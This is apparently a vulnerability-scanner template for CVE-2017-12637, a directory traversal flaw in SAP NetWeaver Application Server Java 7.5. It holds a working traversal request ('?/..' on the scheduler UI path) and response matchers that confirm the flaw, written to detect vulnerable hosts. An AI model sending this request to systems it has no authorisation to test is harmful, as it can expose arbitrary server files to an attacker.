id: CVE-2017-12637 info: name: Directory traversal vulnerability in SAP NetWeaver Application Server Java 7.5 author: apt-mirror severity: high description: Directory traversal vulnerability in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS in SAP NetWeaver Application Server Java 7.5 allows remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657. tags: cve,cve2017,sap,lfi reference: | - https://www.cvedetails.com/cve/CVE-2017-12637/ - https://nvd.nist.gov/vuln/detail/CVE-2017-12637 - https://download.ernw-insight.de/troopers/tr18/slides/TR18_SAP_SAP-Bugs-The-Phantom-Security.pdf requests: - method: GET path: - "{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.." matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "WEB-INF" - "META-INF" condition: and part: body